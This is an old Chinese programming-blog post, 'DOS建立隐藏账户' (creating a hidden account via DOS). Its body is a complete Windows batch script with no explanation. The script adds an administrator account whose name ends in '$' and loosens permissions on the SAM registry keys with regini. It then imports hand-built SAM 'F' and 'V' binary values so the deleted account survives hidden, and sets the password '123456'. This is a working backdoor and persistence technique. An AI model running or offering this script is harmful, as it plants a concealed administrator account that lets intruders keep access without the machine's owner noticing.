S.l.e!ep.¢%

像打了激速一样,以四倍的速度运转,开心的工作
简单、开放、平等的公司文化;尊重个性、自由与个人价值;
posts - 1098, comments - 335, trackbacks - 0, articles - 1
  C++博客 :: 首页 :: 新随笔 :: 联系 :: 聚合  :: 管理

DOS建立隐藏账户

Posted on 2008-12-05 21:40 S.l.e!ep.¢% 阅读(647) 评论(1)  编辑 收藏 引用 所属分类: DOS
@echo off
net user wangzenggogo$ wangzenggogo /add
net localgroup administrators wangzenggogo$ /add
echo HKEY_LOCAL_MACHINE\SAM\SAM\ [1] >>1.txt
echo HKEY_LOCAL_MACHINE\SAM\SAM\Domains\ [1] >>1.txt
echo HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\ [1] >>1.txt
echo HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\ [1] >>1.txt
echo HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names [1] >>1.txt
echo HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F4 [1] >>1.txt
echo HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F5 [1] >>1.txt
regini.exe 1.txt
del 1.txt
echo Windows Registry Editor Version 5.00 > wangzenggogo$.reg
echo [HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\wangzenggogo$] >> wangzenggogo$.reg
echo @=hex(3eb): >> wangzenggogo$.reg
echo Windows Registry Editor Version 5.00 > 3EB.reg
echo [HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000003EB] >> 3EB.reg
echo "F"=hex:02,00,01,00,00,00,00,00,fc,52,7c,ac,8d,c1,c8,01,00,00,00,00,00,00,00,\ >> 3EB.reg
echo   00,86,2c,c2,ad,1c,33,c8,01,ff,ff,ff,ff,ff,ff,ff,7f,00,00,00,00,00,00,00,00,\ >> 3EB.reg
echo   f4,01,00,00,01,02,00,00,10,02,00,00,00,00,00,00,00,00,0b,00,01,00,00,00,00,\ >> 3EB.reg
echo   00,00,00,00,00,00,00 >> 3EB.reg
echo "V"=hex:00,00,00,00,bc,00,00,00,02,00,01,00,bc,00,00,00,1a,00,00,00,00,00,00,\ >> 3EB.reg
echo   00,d8,00,00,00,00,00,00,00,00,00,00,00,d8,00,00,00,00,00,00,00,00,00,00,00,\ >> 3EB.reg
echo   d8,00,00,00,00,00,00,00,00,00,00,00,d8,00,00,00,00,00,00,00,00,00,00,00,d8,\ >> 3EB.reg
echo   00,00,00,00,00,00,00,00,00,00,00,d8,00,00,00,00,00,00,00,00,00,00,00,d8,00,\ >> 3EB.reg
echo   00,00,00,00,00,00,00,00,00,00,d8,00,00,00,00,00,00,00,00,00,00,00,d8,00,00,\ >> 3EB.reg
echo   00,00,00,00,00,00,00,00,00,d8,00,00,00,00,00,00,00,00,00,00,00,d8,00,00,00,\ >> 3EB.reg
echo   08,00,00,00,01,00,00,00,e0,00,00,00,14,00,00,00,00,00,00,00,f4,00,00,00,14,\ >> 3EB.reg
echo   00,00,00,00,00,00,00,08,01,00,00,04,00,00,00,00,00,00,00,0c,01,00,00,04,00,\ >> 3EB.reg
echo   00,00,00,00,00,00,01,00,14,80,9c,00,00,00,ac,00,00,00,14,00,00,00,44,00,00,\ >> 3EB.reg
echo   00,02,00,30,00,02,00,00,00,02,c0,14,00,44,00,05,01,01,01,00,00,00,00,00,01,\ >> 3EB.reg
echo   00,00,00,00,02,c0,14,00,ff,07,0f,00,01,01,00,00,00,00,00,05,07,00,00,00,02,\ >> 3EB.reg
echo   00,58,00,03,00,00,00,00,00,24,00,44,00,02,00,01,05,00,00,00,00,00,05,15,00,\ >> 3EB.reg
echo   00,00,eb,25,79,2c,4b,2c,bc,1a,43,17,0a,32,eb,03,00,00,00,00,18,00,ff,07,0f,\ >> 3EB.reg
echo   00,01,02,00,00,00,00,00,05,20,00,00,00,20,02,00,00,00,00,14,00,5b,03,02,00,\ >> 3EB.reg
echo   01,01,00,00,00,00,00,01,00,00,00,00,01,02,00,00,00,00,00,05,20,00,00,00,20,\ >> 3EB.reg
echo   02,00,00,01,02,00,00,00,00,00,05,20,00,00,00,20,02,00,00,77,00,61,00,6e,00,\ >> 3EB.reg
echo   67,00,7a,00,65,00,6e,00,67,00,67,00,6f,00,67,00,6f,00,24,00,00,00,01,02,00,\ >> 3EB.reg
echo   00,07,00,00,00,01,00,01,00,f3,0d,8e,33,95,cd,e9,8f,12,b7,9a,ed,98,60,17,2f,\ >> 3EB.reg
echo   01,00,01,00,36,9f,5d,12,1b,86,55,67,f1,f7,49,c8,b0,21,ef,45,01,00,01,00,01,\ >> 3EB.reg
echo   00,01,00 >> 3EB.reg
net user wangzenggogo$ /del
regedit /s wangzenggogo$.reg
del wangzenggogo$.reg
regedit /s 3EB.reg
del 3EB.reg
echo HKEY_LOCAL_MACHINE\SAM\SAM\ [2] >>1.txt
echo HKEY_LOCAL_MACHINE\SAM\SAM\Domains\ [2] >>1.txt
echo HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\ [2] >>1.txt
echo HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\ [2] >>1.txt
echo HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names [2] >>1.txt
echo HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F4 [2] >>1.txt
echo HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F5 [2] >>1.txt
regini.exe 1.txt
del 1.txt
net user wangzenggogo$ 123456

只有注册用户登录后才能发表评论。
网站导航: 博客园   IT新闻   BlogJava   知识库   博问   管理